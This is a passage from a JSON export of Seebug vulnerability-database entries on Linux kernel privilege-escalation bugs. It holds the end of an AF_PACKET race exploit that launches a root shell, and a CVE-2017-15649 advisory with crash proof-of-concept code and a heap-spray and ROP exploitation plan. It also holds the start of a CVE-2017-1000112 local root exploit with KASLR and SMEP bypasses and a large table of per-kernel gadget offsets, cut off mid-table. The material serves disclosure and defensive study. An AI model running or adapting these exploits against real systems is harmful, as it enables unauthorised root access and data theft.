}\r\n \r\n fprintf(stderr,\"linux AF_PACKET race condition exploit by rebel\\n\");\r\n \r\n uname(&u);\r\n \r\n if((f = strstr(u.version,\"-Ubuntu\")) != NULL) *f = '\\0';\r\n \r\n snprintf(buf,512,\"%s %s\",u.release,u.version);\r\n \r\n printf(\"kernel version: %s\\n\",buf);\r\n \r\n \r\n for(i=0; offsets[i].kernel_version != NULL; i++) {\r\n if(!strcmp(offsets[i].kernel_version,buf)) {\r\n \r\n while(offsets[i].proc_dostring == 0)\r\n i--;\r\n \r\n off = &offsets[i];\r\n break;\r\n }\r\n }\r\n \r\n if(crash) {\r\n off = &offsets[0];\r\n off->set_memory_rw = 0xffffffff41414141;\r\n }\r\n \r\n if(off) {\r\n printf(\"proc_dostring = %p\\n\",(void *)off->proc_dostring);\r\n printf(\"modprobe_path = %p\\n\",(void *)off->modprobe_path);\r\n printf(\"register_sysctl_table = %p\\n\",(void *)off->register_sysctl_table);\r\n printf(\"set_memory_rw = %p\\n\",(void *)off->set_memory_rw);\r\n }\r\n \r\n if(!off) {\r\n fprintf(stderr,\"i have no offsets for this kernel version..\\n\");\r\n exit(-1);\r\n }\r\n \r\n pid = fork();\r\n \r\n if(pid == 0) {\r\n if(unshare(CLONE_NEWUSER) != 0)\r\n fprintf(stderr, \"failed to create new user namespace\\n\");\r\n \r\n if(unshare(CLONE_NEWNET) != 0)\r\n fprintf(stderr, \"failed to create new network namespace\\n\");\r\n \r\n wrapper();\r\n exit(0);\r\n }\r\n \r\n waitpid(pid, &status, 0);\r\n \r\n launch_rootshell();\r\n return 0;\r\n}\n ", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-92567"}, {"lastseen": "2017-11-19T13:11:55", "bulletinFamily": "exploit", "description": "### Vulnerabilities summary\r\nThe following advisory describes a use-after-free vulnerability found in Linux Kernel\u2019s implementation of AF_PACKET that can lead to privilege escalation.\r\n\r\nAF_PACKET sockets \u201callow users to send or receive packets on the device driver level. This for example lets them to implement their own protocol on top of the physical layer or to sniff packets including Ethernet and higher levels protocol headers\u201d\r\n\r\n### Credit\r\nThe vulnerability was discovered by an independent security researcher which reported this vulnerabilities to Beyond Security\u2019s SecuriTeam Secure Disclosure program.\r\n\r\nVendor response\r\nUpdate 1\r\nCVE: CVE-2017-15649\r\n\r\n\u201cIt is quite likely that this is already fixed by:\r\npacket: hold bind lock when rebinding to fanout hook \u2013 http://patchwork.ozlabs.org/patch/813945/\r\n\r\nAlso relevant, but not yet merged is\r\npacket: in packet_do_bind, test fanout with bind_lock held \u2013 http://patchwork.ozlabs.org/patch/818726/\r\n\r\nWe verified that this does not trigger on v4.14-rc2, but does trigger when reverting that first mentioned commit (008ba2a13f2d).\u201d\r\n\r\n\r\n### Vulnerabilities details\r\n\r\nThis use-after-free is due to a race condition between fanout_add (from setsockopt) and bind on a AF_PACKET socket.\r\n\r\nThe race will cause `__unregister_prot_hook()` from packet_do_bind() to set po->running to 0 even though a packet_fanout has been created from fanout_add().\r\n\r\nThis allows us to bypass the check in unregister_prot_hook() from packet_release() effectively causing the packet_fanout to be released and still being referenced from the packet_type linked list.\r\n\r\n### Crash Proof of Concept\r\n```\r\n// Please note, to have KASAN report the UAF, you need to enable it when compiling the kernel.\r\n// the kernel config is provided too.\r\n\r\n#define _GNU_SOURCE\r\n\r\n#include <stdio.h>\r\n#include <stdlib.h>\r\n#include <string.h>\r\n#include <unistd.h>\r\n#include <sys/types.h>\r\n#include <sys/socket.h>\r\n#include <sys/ioctl.h>\r\n#include <net/if.h>\r\n#include <pthread.h>\r\n#include <sys/utsname.h>\r\n#include <sched.h>\r\n#include <stdarg.h>\r\n#include <stdbool.h>\r\n#include <sys/stat.h>\r\n#include <fcntl.h>\r\n\r\n#define IS_ERR(c, s) { if (c) perror(s); }\r\n\r\nstruct sockaddr_ll {\r\n\tunsigned short\tsll_family;\r\n\tshort\t\tsll_protocol; // big endian\r\n\tint\t\tsll_ifindex;\r\n\tunsigned short\tsll_hatype;\r\n\tunsigned char\tsll_pkttype;\r\n\tunsigned char\tsll_halen;\r\n\tunsigned char\tsll_addr[8];\r\n};\r\n\r\nstatic int fd;\r\nstatic struct ifreq ifr;\r\nstatic struct sockaddr_ll addr;\r\n\r\nvoid *task1(void *unused)\r\n{\t\r\n\tint fanout_val = 0x3;\r\n\r\n\t// need race: check on po->running\r\n\t// also must be 1st or link wont register\r\n\tint err = setsockopt(fd, 0x107, 18, &fanout_val, sizeof(fanout_val));\r\n\t// IS_ERR(err == -1, \"setsockopt\");\t\r\n}\r\n\r\nvoid *task2(void *unused)\r\n{\r\n\tint err = bind(fd, (struct sockaddr *)&addr, sizeof(addr));\r\n\t// IS_ERR(err == -1, \"bind\");\r\n}\r\n\r\nvoid loop_race()\r\n{\r\n\tint err, index;\r\n\r\n\twhile(1) {\r\n\t\tfd = socket(AF_PACKET, SOCK_RAW, PF_PACKET);\r\n\t\tIS_ERR(fd == -1, \"socket\");\r\n\r\n\t\tstrcpy((char *)&ifr.ifr_name, \"lo\");\r\n\t\terr = ioctl(fd, SIOCGIFINDEX, &ifr);\r\n\t\tIS_ERR(err == -1, \"ioctl SIOCGIFINDEX\");\r\n\t\tindex = ifr.ifr_ifindex;\r\n\r\n\t\terr = ioctl(fd, SIOCGIFFLAGS, &ifr);\r\n\t\tIS_ERR(err == -1, \"ioctl SIOCGIFFLAGS\");\r\n\r\n\t\tifr.ifr_flags &= ~(short)IFF_UP;\r\n\t\terr = ioctl(fd, SIOCSIFFLAGS, &ifr);\r\n\t\tIS_ERR(err == -1, \"ioctl SIOCSIFFLAGS\");\r\n\r\n\t\taddr.sll_family = AF_PACKET;\r\n\t\taddr.sll_protocol = 0x0; // need something different to rehook && 0 to skip register_prot_hook\r\n\t\taddr.sll_ifindex = index;\r\n\r\n\t\tpthread_t thread1, thread2;\r\n\t pthread_create (&thread1, NULL, task1, NULL);\r\n\t pthread_create (&thread2, NULL, task2, NULL);\r\n\r\n\t pthread_join(thread1, NULL);\r\n\t pthread_join(thread2, NULL);\r\n\r\n\t\t// UAF\r\n\t\tclose(fd); \r\n\t}\r\n}\r\n\r\nstatic bool write_file(const char* file, const char* what, ...) {\r\n\tchar buf[1024];\r\n\tva_list args;\r\n\tva_start(args, what);\r\n\tvsnprintf(buf, sizeof(buf), what, args);\r\n\tva_end(args);\r\n\tbuf[sizeof(buf) - 1] = 0;\r\n\tint len = strlen(buf);\r\n\r\n\tint fd = open(file, O_WRONLY | O_CLOEXEC);\r\n\tif (fd == -1)\r\n\t\treturn false;\r\n\tif (write(fd, buf, len) != len) {\r\n\t\tclose(fd);\r\n\t\treturn false;\r\n\t}\r\n\tclose(fd);\r\n\treturn true;\r\n}\r\n\r\nvoid setup_sandbox() {\r\n\tint real_uid = getuid();\r\n\tint real_gid = getgid();\r\n\r\n\tif (unshare(CLONE_NEWUSER) != 0) {\r\n\t\tprintf(\"[!] unprivileged user namespaces are not available\\n\");\r\n\t\tperror(\"[-] unshare(CLONE_NEWUSER)\");\r\n\t\texit(EXIT_FAILURE);\r\n\t}\r\n\tif (unshare(CLONE_NEWNET) != 0) {\r\n\t\tperror(\"[-] unshare(CLONE_NEWUSER)\");\r\n\t\texit(EXIT_FAILURE);\r\n\t}\r\n\r\n\tif (!write_file(\"/proc/self/setgroups\", \"deny\")) {\r\n\t\tperror(\"[-] write_file(/proc/self/set_groups)\");\r\n\t\texit(EXIT_FAILURE);\r\n\t}\r\n\tif (!write_file(\"/proc/self/uid_map\", \"0 %d 1\\n\", real_uid)) {\r\n\t\tperror(\"[-] write_file(/proc/self/uid_map)\");\r\n\t\texit(EXIT_FAILURE);\r\n\t}\r\n\tif (!write_file(\"/proc/self/gid_map\", \"0 %d 1\\n\", real_gid)) {\r\n\t\tperror(\"[-] write_file(/proc/self/gid_map)\");\r\n\t\texit(EXIT_FAILURE);\r\n\t}\r\n}\r\n\r\nint main(int argc, char *argv[]) \r\n{\r\n\tsetup_sandbox();\r\n\tsystem(\"id; capsh --print\");\r\n\tloop_race();\t\r\n\treturn 0;\r\n}\r\n```\r\n\r\n### Crash report\r\n```\r\n[ 73.703931] dev_remove_pack: ffff880067cee280 not found\r\n[ 73.717350] ==================================================================\r\n[ 73.726151] BUG: KASAN: use-after-free in dev_add_pack+0x1b1/0x1f0\r\n[ 73.729371] Write of size 8 at addr ffff880067d28870 by task poc/1175\r\n[ 73.732594] \r\n[ 73.733605] CPU: 3 PID: 1175 Comm: poc Not tainted 4.14.0-rc1+ #29\r\n[ 73.737714] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.10.1-1ubuntu1 04/01/2014\r\n[ 73.746433] Call Trace:\r\n[ 73.747985] dump_stack+0x6c/0x9c\r\n[ 73.749410] ? dev_add_pack+0x1b1/0x1f0\r\n[ 73.751622] print_address_description+0x73/0x290\r\n[ 73.753646] ? dev_add_pack+0x1b1/0x1f0\r\n[ 73.757343] kasan_report+0x22b/0x340\r\n[ 73.758839] __asan_report_store8_noabort+0x17/0x20\r\n[ 73.760617] dev_add_pack+0x1b1/0x1f0\r\n[ 73.761994] register_prot_hook.part.52+0x90/0xa0\r\n[ 73.763675] packet_create+0x5e3/0x8c0\r\n[ 73.765072] __sock_create+0x1d0/0x440\r\n[ 73.766030] SyS_socket+0xef/0x1b0\r\n[ 73.766891] ? move_addr_to_kernel+0x60/0x60\r\n[ 73.769137] ? exit_to_usermode_loop+0x118/0x150\r\n[ 73.771668] entry_SYSCALL_64_fastpath+0x13/0x94\r\n[ 73.773754] RIP: 0033:0x44d8a7\r\n[ 73.775130] RSP: 002b:00007ffc4e642818 EFLAGS: 00000217 ORIG_RAX: 0000000000000029\r\n[ 73.780503] RAX: ffffffffffffffda RBX: 00000000004002f8 RCX: 000000000044d8a7\r\n[ 73.785654] RDX: 0000000000000011 RSI: 0000000000000003 RDI: 0000000000000011\r\n[ 73.790358] RBP: 00007ffc4e642840 R08: 00000000000000ca R09: 00007f4192e6e9d0\r\n[ 73.793544] R10: 0000000000000000 R11: 0000000000000217 R12: 000000000040b410\r\n[ 73.795999] R13: 000000000040b4a0 R14: 0000000000000000 R15: 0000000000000000\r\n[ 73.798567] \r\n[ 73.799095] Allocated by task 1360:\r\n[ 73.800300] save_stack_trace+0x16/0x20\r\n[ 73.802533] save_stack+0x46/0xd0\r\n[ 73.803959] kasan_kmalloc+0xad/0xe0\r\n[ 73.805833] kmem_cache_alloc_trace+0xd7/0x190\r\n[ 73.808233] packet_setsockopt+0x1d29/0x25c0\r\n[ 73.810226] SyS_setsockopt+0x158/0x240\r\n[ 73.811957] entry_SYSCALL_64_fastpath+0x13/0x94\r\n[ 73.814636] \r\n[ 73.815367] Freed by task 1175:\r\n[ 73.816935] save_stack_trace+0x16/0x20\r\n[ 73.821621] save_stack+0x46/0xd0\r\n[ 73.825576] kasan_slab_free+0x72/0xc0\r\n[ 73.827477] kfree+0x91/0x190\r\n[ 73.828523] packet_release+0x700/0xbd0\r\n[ 73.830162] sock_release+0x8d/0x1d0\r\n[ 73.831612] sock_close+0x16/0x20\r\n[ 73.832906] __fput+0x276/0x6d0\r\n[ 73.834730] ____fput+0x15/0x20\r\n[ 73.835998] task_work_run+0x121/0x190\r\n[ 73.837564] exit_to_usermode_loop+0x131/0x150\r\n[ 73.838709] syscall_return_slowpath+0x15c/0x1a0\r\n[ 73.840403] entry_SYSCALL_64_fastpath+0x92/0x94\r\n[ 73.842343] \r\n[ 73.842765] The buggy address belongs to the object at ffff880067d28000\r\n[ 73.842765] which belongs to the cache kmalloc-4096 of size 4096\r\n[ 73.845897] The buggy address is located 2160 bytes inside of\r\n[ 73.845897] 4096-byte region [ffff880067d28000, ffff880067d29000)\r\n[ 73.851443] The buggy address belongs to the page:\r\n[ 73.852989] page:ffffea00019f4a00 count:1 mapcount:0 mapping: (null) index:0x0 compound_mapcount: 0\r\n[ 73.861329] flags: 0x100000000008100(slab|head)\r\n[ 73.862992] raw: 0100000000008100 0000000000000000 0000000000000000 0000000180070007\r\n[ 73.866052] raw: dead000000000100 dead000000000200 ffff88006cc02f00 0000000000000000\r\n[ 73.870617] page dumped because: kasan: bad access detected\r\n[ 73.872456] \r\n[ 73.872851] Memory state around the buggy address:\r\n[ 73.874057] ffff880067d28700: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb\r\n[ 73.876931] ffff880067d28780: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb\r\n[ 73.878913] >ffff880067d28800: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb\r\n[ 73.880658] ^\r\n[ 73.884772] ffff880067d28880: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb\r\n[ 73.890978] ffff880067d28900: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb\r\n[ 73.897763] ==================================================================\r\n```\r\n\r\nWe know that the freed object is a kmalloc-4096 object:\r\n```\r\nstruct packet_fanout {\r\n\tpossible_net_t\t\tnet;\r\n\tunsigned int\t\tnum_members;\r\n\tu16\t\t\tid;\r\n\tu8\t\t\ttype;\r\n\tu8\t\t\tflags;\r\n\tunion {\r\n\t\tatomic_t\t\trr_cur;\r\n\t\tstruct bpf_prog __rcu\t*bpf_prog;\r\n\t};\r\n\tstruct list_head\tlist;\r\n\tstruct sock\t\t*arr[PACKET_FANOUT_MAX];\r\n\tspinlock_t\t\tlock;\r\n\trefcount_t\t\tsk_ref;\r\n\tstruct packet_type\tprot_hook ____cacheline_aligned_in_smp;\r\n};\r\n```\r\n\r\nand that its prot_hook member is the one being referenced in the packet handler when registered via dev_add_pack() from register_prot_hook() inside af_packet.c:\r\n```\r\nstruct packet_type {\r\n\t__be16\t\t\ttype;\t/* This is really htons(ether_type). */\r\n\tstruct net_device\t*dev;\t/* NULL is wildcarded here\t */\r\n\tint\t\t\t(*func) (struct sk_buff *,\r\n\t\t\t\t\t struct net_device *,\r\n\t\t\t\t\t struct packet_type *,\r\n\t\t\t\t\t struct net_device *);\r\n\tbool\t\t\t(*id_match)(struct packet_type *ptype,\r\n\t\t\t\t\t struct sock *sk);\r\n\tvoid\t\t\t*af_packet_priv;\r\n\tstruct list_head\tlist;\r\n};\r\n```\r\n\r\nThe function pointers inside of struct packet_type, and the fact it is in a big slab (kmalloc-4096) makes heap spraying easier and more reliable as bigger slabs are less often used by the kernel.\r\n\r\nWe can use usual kernel heap spraying to replace the content of the freed packet_fanout object by using for example sendmmsg() or any other mean.\r\n\r\nEven if the allocation is not permanent, it will still replace the targeted content in packet_fanout (ie. the function pointers) and due to the fact that kmalloc-4096 is very stable, it is very less likely that another allocation will corrupt our payload.\r\n\r\nid_match() will be called when sending a skb via dev_queue_xmit() which can be reached via a sendmsg on a AF_PACKET socket. It will loop through the list of packet handler calling id_match() if not NULL. Thus, we have a PC control situation.\r\n\r\nOnce we know where the code section of the kernel is, we can pivot the kernel stack into our fake packet_fanout object and ROP. The first argument ptype contains the address of the prot_hook member of our fake object, which allows us to know where to pivot.\r\n\r\nOnce into ROP, we can jump into native_write_c4(x) to disable SMEP/SMAP, and then we could think about jumping back into a userland mmaped executable payload that would call commit_creds(prepare_kernel_cred(0)) to elevate our user process privilege to root.", "modified": "2017-10-24T00:00:00", "published": "2017-10-24T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-96778", "id": "SSV:96778", "type": "seebug", "title": "Linux Kernel AF_PACKET Use-After-Free(CVE-2017-15649)", "sourceData": "", "sourceHref": "", "cvss": {"score": 4.6, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-11-19T11:56:28", "bulletinFamily": "exploit", "description": "### Bug details\r\n\r\nWhen building a UFO packet with MSG_MORE __ip_append_data() calls\r\nip_ufo_append_data() to append. However in between two send() calls,\r\nthe append path can be switched from UFO to non-UFO one, which leads\r\nto a memory corruption.\r\n\r\nIn case UFO packet lengths exceeds MTU, copy = maxfraglen - skb->len\r\nbecomes negative on the non-UFO path and the branch to allocate new\r\nskb is taken. This triggers fragmentation and computation of fraggap =\r\nskb_prev->len - maxfraglen. Fraggap can exceed MTU, causing copy =\r\ndatalen - transhdrlen - fraggap to become negative. Subsequently\r\nskb_copy_and_csum_bits() writes out-of-bounds.\r\n\r\nA similar issue is present in IPv6 code.\r\n\r\nThe bug was introduced in e89e9cf539a2 (\"[IPv4/IPv6]: UFO\r\nScatter-gather approach\") on Oct 18 2005.\r\n\r\nThe fix has been submitted to netdev [1] and should be committed to\r\nmainline and to stable kernels soon. David has also sent an RFC series\r\nto remove UFO completely [2], which should be merged in 4.14.\r\n\r\nIf unprivileged user namespaces are available, this bug can be\r\nexploited to gain root privileges. I'll share the details and the\r\nexploit in a few days.\r\n\r\nThanks!\r\n\r\n### Timeline\r\n\r\n* 2017.08.03 - Bug reported to security () kernel org\r\n* 2017.08.04 - Bug reported to linux-distros@\r\n* 2017.08.10 - Patch submitted to netdev\r\n* 2017.08.10 - Announcement on oss-security@\r\n\r\n### Links\r\n\r\n[1] https://git.kernel.org/pub/scm/linux/kernel/git/davem/net.git/commit/?id=85f1bd9a7b5a79d5baa8bf44af19658f7bf77bfa\r\n\r\n[2] https://www.spinics.net/lists/netdev/msg443815.html", "modified": "2017-08-14T00:00:00", "published": "2017-08-14T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-96343", "id": "SSV:96343", "type": "seebug", "title": "Linux kernel: Exploitable memory corruption due to UFO to non-UFO path switch(CVE-2017-1000112)", "sourceData": "\n // A proof-of-concept local root exploit for CVE-2017-1000112.\r\n// Includes KASLR and SMEP bypasses. No SMAP bypass.\r\n// Tested on Ubuntu trusty 4.4.0-* and Ubuntu xenial 4-8-0-* kernels.\r\n//\r\n// Usage:\r\n// user@ubuntu:~$ uname -a\r\n// Linux ubuntu 4.8.0-58-generic #63~16.04.1-Ubuntu SMP Mon Jun 26 18:08:51 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux\r\n// user@ubuntu:~$ whoami\r\n// user\r\n// user@ubuntu:~$ id\r\n// uid=1000(user) gid=1000(user) groups=1000(user),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),113(lpadmin),128(sambashare)\r\n// user@ubuntu:~$ gcc pwn.c -o pwn\r\n// user@ubuntu:~$ ./pwn \r\n// [.] starting\r\n// [.] checking distro and kernel versions\r\n// [.] kernel version '4.8.0-58-generic' detected\r\n// [~] done, versions looks good\r\n// [.] checking SMEP and SMAP\r\n// [~] done, looks good\r\n// [.] setting up namespace sandbox\r\n// [~] done, namespace sandbox set up\r\n// [.] KASLR bypass enabled, getting kernel addr\r\n// [~] done, kernel text: ffffffffae400000\r\n// [.] commit_creds: ffffffffae4a5d20\r\n// [.] prepare_kernel_cred: ffffffffae4a6110\r\n// [.] SMEP bypass enabled, mmapping fake stack\r\n// [~] done, fake stack mmapped\r\n// [.] executing payload ffffffffae40008d\r\n// [~] done, should be root now\r\n// [.] checking if we got root\r\n// [+] got r00t ^_^\r\n// root@ubuntu:/home/user# whoami\r\n// root\r\n// root@ubuntu:/home/user# id\r\n// uid=0(root) gid=0(root) groups=0(root)\r\n// root@ubuntu:/home/user# cat /etc/shadow\r\n// root:!:17246:0:99999:7:::\r\n// daemon:*:17212:0:99999:7:::\r\n// bin:*:17212:0:99999:7:::\r\n// sys:*:17212:0:99999:7:::\r\n// ...\r\n//\r\n// Andrey Konovalov <andreyknvl@gmail.com>\r\n\r\n#define _GNU_SOURCE\r\n\r\n#include <assert.h>\r\n#include <errno.h>\r\n#include <fcntl.h>\r\n#include <sched.h>\r\n#include <stdarg.h>\r\n#include <stdbool.h>\r\n#include <stdint.h>\r\n#include <stdio.h>\r\n#include <stdlib.h>\r\n#include <string.h>\r\n#include <unistd.h>\r\n\r\n#include <linux/socket.h>\r\n#include <netinet/ip.h>\r\n#include <sys/klog.h>\r\n#include <sys/mman.h>\r\n#include <sys/utsname.h>\r\n\r\n#define ENABLE_KASLR_BYPASS\t\t1\r\n#define ENABLE_SMEP_BYPASS\t\t1\r\n\r\n// Will be overwritten if ENABLE_KASLR_BYPASS is enabled.\r\nunsigned long KERNEL_BASE =\t\t0xffffffff81000000ul;\r\n\r\n// Will be overwritten by detect_versions().\r\nint kernel = -1;\r\n\r\nstruct kernel_info {\r\n\tconst char* distro;\r\n\tconst char* version;\r\n\tuint64_t commit_creds;\r\n\tuint64_t prepare_kernel_cred;\r\n\tuint64_t xchg_eax_esp_ret;\r\n\tuint64_t pop_rdi_ret;\r\n\tuint64_t mov_dword_ptr_rdi_eax_ret;\r\n\tuint64_t mov_rax_cr4_ret;\r\n\tuint64_t neg_rax_ret;\r\n\tuint64_t pop_rcx_ret;\r\n\tuint64_t or_rax_rcx_ret;\r\n\tuint64_t xchg_eax_edi_ret;\r\n\tuint64_t mov_cr4_rdi_ret;\r\n\tuint64_t jmp_rcx;\r\n};\r\n\r\nstruct kernel_info kernels[] = {\r\n\t{ \"trusty\", \"4.4.0-21-generic\", 0x9d7a0, 0x9da80, 0x4520a, 0x30f75, 0x109957, 0x1a7a0, 0x3d6b7a, 0x1cbfc, 0x76453, 0x49d4d, 0x61300, 0x1b91d },\r\n\t{ \"trusty\", \"4.4.0-22-generic\", 0x9d7e0, 0x9dac0, 0x4521a, 0x28c19d, 0x1099b7, 0x1a7f0, 0x3d781a, 0x1cc4c, 0x764b3, 0x49d5d, 0x61300, 0x48040 },\r\n\t{ \"trusty\", \"4.4.0-24-generic\", 0x9d5f0, 0x9d8d0, 0x4516a, 0x1026cd, 0x107757, 0x1a810, 0x3d7a9a, 0x1cc6c, 0x763b3, 0x49cbd, 0x612f0, 0x47fa0 },\r\n\t{ \"trusty\", \"4.4.0-28-generic\", 0x9d760, 0x9da40, 0x4516a, 0x3dc58f, 0x1079a7, 0x1a830, 0x3d801a, 0x1cc8c, 0x763b3, 0x49cbd, 0x612f0, 0x47fa0 },\r\n\t{ \"trusty\", \"4.4.0-31-generic\", 0x9d760, 0x9da40, 0x4516a, 0x3e223f, 0x1079a7, 0x1a830, 0x3ddcca, 0x1cc8c, 0x763b3, 0x49cbd, 0x612f0, 0x47fa0 },\r\n\t{ \"trusty\", \"4.4.0-34-generic\", 0x9d760, 0x9da40, 0x4510a, 0x355689, 0x1079a7, 0x1a830, 0x3ddd1a, 0x1cc8c, 0x763b3, 0x49c5d, 0x612f0, 0x47f40 },\r\n\t{ \"trusty\", \"4.4.0-36-generic\", 0x9d770, 0x9da50, 0x4510a, 0x1eec9d, 0x107a47, 0x1a830, 0x3de02a, 0x1cc8c, 0x763c3, 0x29595, 0x61300, 0x47f40 },\r\n\t{ \"trusty\", \"4.4.0-38-generic\", 0x9d820, 0x9db00, 0x4510a, 0x598fd, 0x107af7, 0x1a820, 0x3de8ca, 0x1cc7c, 0x76473, 0x49c5d, 0x61300, 0x1a77b },\r\n\t{ \"trusty\", \"4.4.0-42-generic\", 0x9d870, 0x9db50, 0x4510a, 0x5f13d, 0x107b17, 0x1a820, 0x3deb7a, 0x1cc7c, 0x76463, 0x49c5d, 0x61300, 0x1a77b },\r\n\t{ \"trusty\", \"4.4.0-45-generic\", 0x9d870, 0x9db50, 0x4510a, 0x5f13d, 0x107b17, 0x1a820, 0x3debda, 0x1cc7c, 0x76463, 0x49c5d, 0x61300, 0x1a77b },\r\n\t{ \"trusty\", \"4.4.0-47-generic\", 0x9d940, 0x9dc20, 0x4511a, 0x171f8d, 0x107bd7, 0x1a820, 0x3e241a, 0x1cc7c, 0x76463, 0x299f5, 0x61300, 0x1a77b },\r\n\t{ \"trusty\", \"4.4.0-51-generic\", 0x9d920, 0x9dc00, 0x4511a, 0x21f15c, 0x107c77, 0x1a820, 0x3e280a, 0x1cc7c, 0x76463, 0x49c6d, 0x61300, 0x1a77b },\r\n\t{ \"trusty\", \"4.4.0-53-generic\", 0x9d920, 0x9dc00, 0x4511a, 0x21f15c, 0x107c77, 0x1a820, 0x3e280a, 0x1cc7c, 0x76463, 0x49c6d, 0x61300, 0x1a77b },\r\n\t{ \"trusty\", \"4.4.0-57-generic\", 0x9ebb0, 0x9ee90, 0x4518a, 0x39401d, 0x1097d7, 0x1a820, 0x3e527a, 0x1cc7c, 0x77493, 0x49cdd, 0x62300, 0x1a77b },\r\n\t{ \"trusty\", \"4.4.0-59-generic\", 0x9ebb0, 0x9ee90, 0x4518a, 0x2dbc4e, 0x1097d7, 0x1a820, 0x3e571a, 0x1cc7c, 0x77493, 0x49cdd, 0x62300, 0x1a77b },\r\n\t{ \"trusty\", \"4.4.0-62-generic\", 0x9ebe0, 0x9eec0, 0x4518a, 0x3ea46f, 0x109837, 0x1a820, 0x3e5e5a, 0x1cc7c, 0x77493, 0x49cdd, 0x62300, 0x1a77b },\r\n\t{ \"trusty\", \"4.4.0-63-generic\", 0x9ebe0, 0x9eec0, 0x4518a, 0x2e2e7d, 0x109847, 0x1a820, 0x3e61ba, 0x1cc7c, 0x77493, 0x49cdd, 0x62300, 0x1a77b },\r\n\t{ \"trusty\", \"4.4.0-64-generic\", 0x9ebe0, 0x9eec0, 0x4518a, 0x2e2e7d, 0x109847, 0x1a820, 0x3e61ba, 0x1cc7c, 0x77493, 0x49cdd, 0x62300, 0x1a77b },\r\n\t{ \"trusty\", \"4.4.0-66-generic\", 0x9ebe0, 0x9eec0, 0x4518a, 0x2e2e7d, 0x109847, 0x1a820, 0x3e61ba, 0x1cc7c, 0x77493, 0x49cdd, 0x62300, 0x1a77b },\r\n\t{ \"trusty\", \"4.4.0-67-generic\", 0x9eb60, 0x9ee40, 0x4518a, 0x12a9dc, 0x109887, 0x1a820, 0x3e67ba, 0x1cc7c, 0x774c3, 0x49cdd, 0x62330, 0x1a77b },\r\n\t{ \"trusty\", \"4.4.0-70-generic\", 0x9eb60, 0x9ee40, 0x4518a, 0xd61a2, 0x109887, 0x1a820, 0x3e63ca, 0x1cc7c, 0x774c3, 0x49cdd, 0x62330, 0x1a77b },\r\n\t{ \"trusty\", \"4.4.0-71-generic\", 0x9eb60, 0x9ee40, 0x4518a, 0xd61a2, 0x109887, 0x1a820, 0x3e63ca, 0x1cc7c, 0x774c3, 0x49cdd, 0x62330, 0x1a77b },\r\n\t{ \"trusty\", \"4.4.0-72-generic\", 0x9eb60, 0x9ee40, 0x4518a, 0xd61a2, 0x109887, 0x1a820, 0x3e63ca, 0x1cc7c, 0x774c3, 0x49cdd, 0x62330, 0x1a77b },\r\n\t{ \"trusty\", \"4.4.0-75-generic\", 0x9eb60, 0x9ee40, 0x4518a, 0x303cfd, 0x1098a7, 0x1a820, 0x3e67ea, 0x1cc7c, 0x774c3, 0x49cdd, 0x62330, 0x1a77b },\r\n\t{ \"trusty\", \"4.4.0-78-generic\", 0x9eb70, 0x9ee50, 0x4518a, 0x30366d, 0x1098b7, 0x1a820, 0x3e710a, 0x1cc7c, 0x774c3, 0x49cdd, 0x62330, 0x1a77b },\r\n\t{ \"trusty\", \"4.4.0-79-generic\", 0x9ebb0, 0x9ee90, 0x4518a, 0x3ebdcf, 0x1099a7, 0x1a830, 0x3e77ba, 0x1cc8c, 0x774e3, 0x49cdd, 0x62330, 0x1a78b },\r\n\t{ \"trusty\", \"4.4.0-81-generic\", 0x9ebb0, 0x9ee90, 0x4518a, 0x2dc688, 0x1099a7, 0x1a830, 0x3e789a, 0x1cc8c, 0x774e3, 0x24487, 0x62330, 0x1a78b },\r\n\t{ \"trusty\", \"4.4.0-83-generic\", 0x9ebc0, 0x9eea0, 0x451ca, 0x2dc6f5, 0x1099b7, 0x1a830, 0x3e78fa, 0x1cc8c, 0x77533, 0x49d1d, 0x62360, 0x1a78b },\r\n\t{ \"xenial\", \"4.8.0-34-generic\", 0xa5d50, 0xa6140, 0x17d15, 0x6854d, 0x119227, 0x1b230, 0x4390da, 0x206c23, 0x7bcf3, 0x12c7f7, 0x64210, 0x49f80 },\r\n\t{ \"xenial\", \"4.8.0-36-generic\", 0xa5d50, 0xa6140, 0x17d15, 0x6854d, 0x119227, 0x1b230, 0x4390da, 0x206c23, 0x7bcf3, 0x12c7f7, 0x64210, 0x49f80 },\r\n\t{ \"xenial\", \"4.8.0-39-generic\", 0xa5cf0, 0xa60e0, 0x17c55, 0xf3980, 0x1191f7, 0x1b170, 0x43996a, 0x2e8363, 0x7bcf3, 0x12c7c7, 0x64210, 0x49f60 },\r\n\t{ \"xenial\", \"4.8.0-41-generic\", 0xa5cf0, 0xa60e0, 0x17c55, 0xf3980, 0x1191f7, 0x1b170, 0x43996a, 0x2e8363, 0x7bcf3, 0x12c7c7, 0x64210, 0x49f60 },\r\n\t{ \"xenial\", \"4.8.0-45-generic\", 0xa5cf0, 0xa60e0, 0x17c55, 0x100935, 0x1191f7, 0x1b170, 0x43999a, 0x185493, 0x7bcf3, 0xdfc5, 0x64210, 0x49f60 },\r\n\t{ \"xenial\", \"4.8.0-46-generic\", 0xa5cf0, 0xa60e0, 0x17c55, 0x100935, 0x1191f7, 0x1b170, 0x43999a, 0x185493, 0x7bcf3, 0x12c7c7, 0x64210, 0x49f60 },\r\n\t{ \"xenial\", \"4.8.0-49-generic\", 0xa5d00, 0xa60f0, 0x17c55, 0x301f2d, 0x119207, 0x1b170, 0x439bba, 0x102e33, 0x7bd03, 0x12c7d7, 0x64210, 0x49f60 },\r\n\t{ \"xenial\", \"4.8.0-52-generic\", 0xa5d00, 0xa60f0, 0x17c55, 0x301f2d, 0x119207, 0x1b170, 0x43a0da, 0x63e843, 0x7bd03, 0x12c7d7, 0x64210, 0x49f60 },\r\n\t{ \"xenial\", \"4.8.0-54-generic\", 0xa5d00, 0xa60f0, 